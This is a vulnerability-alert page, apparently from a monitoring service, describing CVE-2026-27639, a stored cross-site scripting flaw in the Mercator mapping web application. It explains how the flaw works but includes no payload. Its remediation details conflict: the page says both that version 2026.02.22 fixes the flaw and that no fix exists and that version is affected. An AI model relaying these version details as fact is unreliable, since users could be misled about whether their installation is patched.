Monitor vulnerabilities like this one. Sign up free to get alerted when software you use is affected.
8.5

Mercator Maps Software: Unsecured Data Injection Risk Through User Input

CVE-2026-27639
Summary

A security weakness in Mercator Maps Software allows attackers to inject malicious code into the system. This can happen when a user with special access creates or edits information, and other users view that information. To protect your system, update to the latest version of Mercator Maps Software, version 2026.02.22 or later.

What to do

No fix is available yet. Check with your software vendor for updates.

Affected software
VendorProductAffected versionsFix available
sourcentis mercator <= 2026.02.22 –
Original title
Mercator is an open source web application designed to enable mapping of information systems. A stored Cross-Site Scripting (XSS) vulnerability exists in Mercator prior to version 2026.02.22 due to...
Original description
Mercator is an open source web application designed to enable mapping of information systems. A stored Cross-Site Scripting (XSS) vulnerability exists in Mercator prior to version 2026.02.22 due to the use of unescaped Blade directives (`{!! !!}`) in display templates. An authenticated user with the User role can inject arbitrary JavaScript payloads into fields such as "contact point" when creating or editing entities. The payload is then executed in the browser of any user who views the affected page, including administrators. Version 2026.02.22 fixes the vulnerability.
nvd CVSS3.1 5.4
nvd CVSS4.0 8.5
Vulnerability type
CWE-79 Cross-site Scripting (XSS)
Published: 25 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026